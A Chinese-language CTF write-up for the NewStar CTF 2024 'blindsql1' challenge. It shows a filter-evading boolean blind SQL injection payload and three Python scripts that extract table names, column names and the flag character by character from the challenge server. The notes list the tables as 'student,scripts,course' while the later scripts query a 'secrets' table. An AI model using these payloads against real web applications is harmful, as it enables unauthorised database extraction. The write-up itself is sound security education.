NewStar blindsql1 web wp
NewStar blindsql1 web wp
参考官解:blindsql1 | WriteUp - NewStar CTF 2024
发现单引号闭合
输入空格,=,union,/发现都被过滤了
是个布尔盲注,多试几个,然后可以写sql看看
Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('a'))#
然后写脚本,这里我参考官解,然后解释一下几个易错点
char = f'(ord(mid({tables},{i},1)))这里这块table不能直接放进去
也就是说
char = f'(ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),{i},1)))'
是错的,可能跟f-string在本质上并不是字符串常量,而是一个在运行时运算求值的表达式有关,我也不大清楚
import requests,string,time
url = 'http://eci-2ze8beum9soff72dtw60.cloudeci1.ichunqiu.com/'
# Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('s'))#
# Alice' and ord(mid(select group_concat(table_name) from information_schema.tables where table_schema like database(),0,1)) in ('s')#
result = ''
for i in range(1,100):
print(f'[+] Bruting at {i}')
for c in string.ascii_letters + string.digits + '_-{}':
time.sleep(0.01) # 限制速率,防止请求过快
print('[+] Trying:', c)
# 这条语句能查询到当前数据库所有的表名
tables = f'(Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database())))'
# 获取所有表名的第 i 个字符,并计算 ascii 值
char = f'(ord(mid({tables},{i},1)))'
# 爆破该 ascii 值
b = f'(({char})in({ord(c)}))'
# 若 ascii 猜对了,则 and 后面的结果是 true,会返回 Alice 的数据
p = f'Alice\'and({b})#'
res = requests.get(url, params={'student_name': p})
if 'Alice' in res.text:
print('[*]bingo:',c)
result += c
print(result)
break
得到了几个表,student,scripts,course,然后可以看看scripts有哪几个column
import requests,string,time
url = 'http://eci-2ze28vznmioh3wal07jw.cloudeci1.ichunqiu.com:80'
# Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('s'))#
# Alice' and ord(mid(select group_concat(table_name) from information_schema.tables where table_schema like database(),0,1)) in ('s')#
result = ''
for i in range(1,100):
print(f'[+] Bruting at {i}')
for c in string.ascii_letters + string.digits + '_-{}':
time.sleep(0.01) # 限制速率,防止请求过快
print('[+] Trying:', c)
# 这条语句能查询到当前数据库所有的表名
tables = f'(Select(group_concat(column_name))from(information_schema.columns)where((table_name)like(\'secrets\')))'
# 获取所有表名的第 i 个字符,并计算 ascii 值
char = f'(ord(mid({tables},{i},1)))'
# 爆破该 ascii 值
b = f'(({char})in({ord(c)}))'
# 若 ascii 猜对了,则 and 后面的结果是 true,会返回 Alice 的数据
p = f'Alice\'and({b})#'
res = requests.get(url, params={'student_name': p})
if 'Alice' in res.text:
print('[*]bingo:',c)
result += c
print(result)
break
得id,secret_key,secret_value
import requests,string,time
url = 'http://eci-2ze28vznmioh3wal07jw.cloudeci1.ichunqiu.com:80'
# Alice'and((ord(mid((Select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0,1)))in('s'))#
# Alice' and ord(mid(select group_concat(table_name) from information_schema.tables where table_schema like database(),0,1)) in ('s')#
result = ''
for i in range(1,100):
print(f'[+] Bruting at {i}')
for c in string.ascii_letters + string.digits + '_-{}':
time.sleep(0.01) # 限制速率,防止请求过快
print('[+] Trying:', c)
# 这条语句能查询到当前数据库所有的表名
tables = f'(Select(group_concat(secret_value))from(secrets)where((secret_value)like(\'flag%\')))'
# 获取所有表名的第 i 个字符,并计算 ascii 值
char = f'(ord(mid({tables},{i},1)))'
# 爆破该 ascii 值
b = f'(({char})in({ord(c)}))'
# 若 ascii 猜对了,则 and 后面的结果是 true,会返回 Alice 的数据
p = f'Alice\'and({b})#'
res = requests.get(url, params={'student_name': p})
if 'Alice' in res.text:
print('[*]bingo:',c)
result += c
print(result)
break
flag:flag{e7402b65-9fdc-4245-82f4-8e070ad5ad1f}
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果